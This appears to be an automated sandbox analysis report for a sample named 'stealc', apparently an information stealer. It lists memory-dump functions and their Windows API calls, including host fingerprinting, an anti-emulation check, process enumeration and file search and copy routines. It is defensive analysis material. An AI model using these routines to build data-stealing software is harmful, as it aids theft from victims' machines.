Part of subcall function 6BF535A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6BF535FD
Part of subcall function 6BF535A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6BF5363F
Part of subcall function 6BF535A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6BF5369F
Part of subcall function 6BF535A0: __aulldiv.LIBCMT ref: 6BF536E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BF5309F

Part of subcall function 6BF75B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6BF756EE,?,00000001), ref: 6BF75B85
Part of subcall function 6BF75B50: EnterCriticalSection.KERNEL32(6BFDF688,?,?,?,6BF756EE,?,00000001), ref: 6BF75B90
Part of subcall function 6BF75B50: LeaveCriticalSection.KERNEL32(6BFDF688,?,?,?,6BF756EE,?,00000001), ref: 6BF75BD8
Part of subcall function 6BF75B50: GetTickCount64.KERNEL32 ref: 6BF75BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6BF530BE

Part of subcall function 6BF530F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6BF53127
Part of subcall function 6BF530F0: __aulldiv.LIBCMT ref: 6BF53140

Part of subcall function 6BF8AB2A: __onexit.LIBCMT ref: 6BF8AB30

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 393b5f61a930b3e51ad3f8bd1d57a57d2f96c0cd718b5585aaf384f9328a49ef
Instruction ID: 0bca80c88a7332684f02dffe6106336fdd33aafd019e6a063c21389b3ba96388
Opcode Fuzzy Hash: 393b5f61a930b3e51ad3f8bd1d57a57d2f96c0cd718b5585aaf384f9328a49ef
Instruction Fuzzy Hash: 3AF0F933C3474997CB10EF7888427A6B3A0EFAB214F14571AE84553571FB20A1D88391

Function 00F29470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00F29484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00F294A5
CloseHandle.KERNEL32(00000000), ref: 00F294AF

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 1846f50ef52e3798d4c768460138f1ed240e4efacf9c2ee9fb89f88c0f008a7d
Instruction ID: dbb88424b93b508b2a4ee65a70908b634be3bfa899b2be7d7c40771f5a35ef6b
Opcode Fuzzy Hash: 1846f50ef52e3798d4c768460138f1ed240e4efacf9c2ee9fb89f88c0f008a7d
Instruction Fuzzy Hash: 70F03A7494020CEBDB18EFA4E84AFE97778EB08311F004598BA1997280D6B46AC5DB90

Function 00F11110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00F26A1C), ref: 00F1112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,00F26A1C), ref: 00F11132
ExitProcess.KERNEL32 ref: 00F11143

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 29688e0fa83c28e5c18db0defbfc8f7192b967438ec9a359052728d6a2afe2ab
Instruction ID: bf025557a68b108a47354d77dd1e603fea4e4318804dc88d017cdfb0271765d0
Opcode Fuzzy Hash: 29688e0fa83c28e5c18db0defbfc8f7192b967438ec9a359052728d6a2afe2ab
Instruction Fuzzy Hash: C3E0E670D85308FBE724ABA0AC0AB497A7CAF04B12F104154F719775C4D6B526809799

Function 00F21A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2A740: lstrcpy.KERNEL32(00F30AEF,00000000), ref: 00F2A788

Part of subcall function 00F2A9B0: lstrlenA.KERNEL32(?,00F31110,?,00000000,00F30AEF), ref: 00F2A9C5
Part of subcall function 00F2A9B0: lstrcpy.KERNEL32(00000000), ref: 00F2AA04
Part of subcall function 00F2A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00F2AA12

Part of subcall function 00F2A8A0: lstrcpy.KERNEL32(?,00F30AEF), ref: 00F2A905

Part of subcall function 00F27500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F27542
Part of subcall function 00F27500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F2757F
Part of subcall function 00F27500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27603
Part of subcall function 00F27500: HeapAlloc.KERNEL32(00000000), ref: 00F2760A

Part of subcall function 00F2A920: lstrcpy.KERNEL32(00000000,?), ref: 00F2A972
Part of subcall function 00F2A920: lstrcatA.KERNEL32(00000000), ref: 00F2A982

Part of subcall function 00F27690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F276A4
Part of subcall function 00F27690: HeapAlloc.KERNEL32(00000000), ref: 00F276AB

Part of subcall function 00F277C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,00F2DBC0,000000FF,?,00F21C99,00000000,?,017817E8,00000000,?), ref: 00F277F2
Part of subcall function 00F277C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,00F2DBC0,000000FF,?,00F21C99,00000000,?,017817E8,00000000,?), ref: 00F277F9

Part of subcall function 00F27850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F111B7), ref: 00F27880
Part of subcall function 00F27850: HeapAlloc.KERNEL32(00000000,?,?,?,00F111B7), ref: 00F27887
Part of subcall function 00F27850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F2789F

Part of subcall function 00F278E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F26A2B), ref: 00F27910
Part of subcall function 00F278E0: HeapAlloc.KERNEL32(00000000,?,?,?,00F26A2B), ref: 00F27917
Part of subcall function 00F278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00F2792F

Part of subcall function 00F27980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F30E00,00000000,?), ref: 00F279B0
Part of subcall function 00F27980: HeapAlloc.KERNEL32(00000000,?,?,?,?,00F30E00,00000000,?), ref: 00F279B7
Part of subcall function 00F27980: GetLocalTime.KERNEL32(?,?,?,?,?,00F30E00,00000000,?), ref: 00F279C4
Part of subcall function 00F27980: wsprintfA.USER32 ref: 00F279F3

Part of subcall function 00F27A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01780DF8,00000000,?,00F30E10,00000000,?,00000000,00000000), ref: 00F27A63
Part of subcall function 00F27A30: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,01780DF8,00000000,?,00F30E10,00000000,?,00000000,00000000,?), ref: 00F27A6A
Part of subcall function 00F27A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01780DF8,00000000,?,00F30E10,00000000,?,00000000,00000000,?), ref: 00F27A7D

Part of subcall function 00F27B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,01780DF8,00000000,?,00F30E10,00000000,?,00000000,00000000), ref: 00F27B35

Part of subcall function 00F27B90: GetKeyboardLayoutList.USER32(00000000,00000000,00F305AF), ref: 00F27BE1
Part of subcall function 00F27B90: LocalAlloc.KERNEL32(00000040,?), ref: 00F27BF9
Part of subcall function 00F27B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00F27C0D
Part of subcall function 00F27B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00F27C62
Part of subcall function 00F27B90: LocalFree.KERNEL32(00000000), ref: 00F27D22

Part of subcall function 00F27D80: GetSystemPowerStatus.KERNEL32(?), ref: 00F27DAD

GetCurrentProcessId.KERNEL32(00000000,?,01781768,00000000,?,00F30E24,00000000,?,00000000,00000000,?,01780C78,00000000,?,00F30E20,00000000), ref: 00F2207E

Part of subcall function 00F29470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00F29484
Part of subcall function 00F29470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00F294A5
Part of subcall function 00F29470: CloseHandle.KERNEL32(00000000), ref: 00F294AF

Part of subcall function 00F27E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27E37
Part of subcall function 00F27E00: HeapAlloc.KERNEL32(00000000), ref: 00F27E3E
Part of subcall function 00F27E00: RegOpenKeyExA.KERNEL32(80000002,0177A198,00000000,00020119,?), ref: 00F27E5E
Part of subcall function 00F27E00: RegQueryValueExA.KERNEL32(?,017815A8,00000000,00000000,000000FF,000000FF), ref: 00F27E7F
Part of subcall function 00F27E00: RegCloseKey.ADVAPI32(?), ref: 00F27E92

Part of subcall function 00F27F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00F27FC9
Part of subcall function 00F27F60: GetLastError.KERNEL32 ref: 00F27FD8

Part of subcall function 00F27ED0: GetSystemInfo.KERNEL32(00F30E2C), ref: 00F27F00
Part of subcall function 00F27ED0: wsprintfA.USER32 ref: 00F27F16

Part of subcall function 00F28100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01780C90,00000000,?,00F30E2C,00000000,?,00000000), ref: 00F28130
Part of subcall function 00F28100: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,01780C90,00000000,?,00F30E2C,00000000,?,00000000,00000000), ref: 00F28137
Part of subcall function 00F28100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00F28158
Part of subcall function 00F28100: __aulldiv.LIBCMT ref: 00F28172
Part of subcall function 00F28100: __aulldiv.LIBCMT ref: 00F28180
Part of subcall function 00F28100: wsprintfA.USER32 ref: 00F281AC

Part of subcall function 00F287C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F30E28,00000000,?), ref: 00F2882F
Part of subcall function 00F287C0: HeapAlloc.KERNEL32(00000000,?,?,?,?,00F30E28,00000000,?), ref: 00F28836
Part of subcall function 00F287C0: wsprintfA.USER32 ref: 00F28850

Part of subcall function 00F28320: RegOpenKeyExA.KERNEL32(00000000,0177E2E8,00000000,00020019,00000000,00F305B6), ref: 00F283A4

Part of subcall function 00F28320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F28426
Part of subcall function 00F28320: wsprintfA.USER32 ref: 00F28459
Part of subcall function 00F28320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00F2847B
Part of subcall function 00F28320: RegCloseKey.ADVAPI32(00000000), ref: 00F2848C
Part of subcall function 00F28320: RegCloseKey.ADVAPI32(00000000), ref: 00F28499

Part of subcall function 00F28680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00F305B7), ref: 00F286CA
Part of subcall function 00F28680: Process32First.KERNEL32(?,00000128), ref: 00F286DE
Part of subcall function 00F28680: Process32Next.KERNEL32(?,00000128), ref: 00F286F3
Part of subcall function 00F28680: CloseHandle.KERNEL32(?), ref: 00F28761

lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00F2265B

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 2204142833-0
Opcode ID: cfc65dc390b294fd074615778015981eedbef0c116739b8e0e6f352447ee2dc0
Instruction ID: 9ca107dfcc88830acb5fd51f6e88280106fb4f3f83b1b8ad3551af1391bd6cc2
Opcode Fuzzy Hash: cfc65dc390b294fd074615778015981eedbef0c116739b8e0e6f352447ee2dc0
Instruction Fuzzy Hash: 2A725172C11128ABDB19FB90FCA2DDE733CAF14300F5046A9F11666092EF346B99DB65

Function 00F16BE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(E9FC458B,087400FC,00000040,00000040), ref: 00F16C9F

Strings

@, xrefs: 00F16C79

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 0379ae382bd5b20444177d28deb555db3fb6cb910493085d6a04e64980efd7f3
Instruction ID: b96a05ae0b13920c1b34fce3fc42349b44435c3e12ff140be165432bf07b1467
Opcode Fuzzy Hash: 0379ae382bd5b20444177d28deb555db3fb6cb910493085d6a04e64980efd7f3
Instruction Fuzzy Hash: 6F21D475A00208EFDB04CF89C594BEEBBB5FB48316F108199D599AB341D735AA81EFC0

Function 00F16D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd067886673db0ceb0f8b72f1177db0bd016711bbd4f03d0495b7273728a5fb8
Instruction ID: 2e9e71a19f99cbc4146e4154abfa1df95c271a1aa66d2ccade8445bd13d8379b
Opcode Fuzzy Hash: fd067886673db0ceb0f8b72f1177db0bd016711bbd4f03d0495b7273728a5fb8
Instruction Fuzzy Hash: 7C61F5B5D00218EFCB14DF94E984BEEB7B0BB48304F148598E419A7280E775AE95EF91

Function 00F24BB0 Relevance: 3.1, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F28DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00F28E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00F24BEA
lstrcatA.KERNEL32(?,01781788), ref: 00F24C08

Part of subcall function 00F24910: wsprintfA.USER32 ref: 00F2492C
Part of subcall function 00F24910: FindFirstFileA.KERNEL32(?,?), ref: 00F24943

Part of subcall function 00F24910: StrCmpCA.SHLWAPI(?,00F30FDC), ref: 00F24971
Part of subcall function 00F24910: StrCmpCA.SHLWAPI(?,00F30FE0), ref: 00F24987
Part of subcall function 00F24910: FindNextFileA.KERNEL32(000000FF,?), ref: 00F24B7D
Part of subcall function 00F24910: FindClose.KERNEL32(000000FF), ref: 00F24B92

Part of subcall function 00F24910: wsprintfA.USER32 ref: 00F249B0
Part of subcall function 00F24910: StrCmpCA.SHLWAPI(?,00F308D2), ref: 00F249C5
Part of subcall function 00F24910: wsprintfA.USER32 ref: 00F249E2
Part of subcall function 00F24910: PathMatchSpecA.SHLWAPI(?,?), ref: 00F24A1E
Part of subcall function 00F24910: lstrcatA.KERNEL32(?,0177DFF8,?,000003E8), ref: 00F24A4A
Part of subcall function 00F24910: lstrcatA.KERNEL32(?,00F30FF8), ref: 00F24A5C
Part of subcall function 00F24910: lstrcatA.KERNEL32(?,?), ref: 00F24A70
Part of subcall function 00F24910: lstrcatA.KERNEL32(?,00F30FFC), ref: 00F24A82
Part of subcall function 00F24910: lstrcatA.KERNEL32(?,?), ref: 00F24A96
Part of subcall function 00F24910: CopyFileA.KERNEL32(?,?,00000001), ref: 00F24AAC
Part of subcall function 00F24910: DeleteFileA.KERNEL32(?), ref: 00F24B31

Part of subcall function 00F24910: wsprintfA.USER32 ref: 00F24A07

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
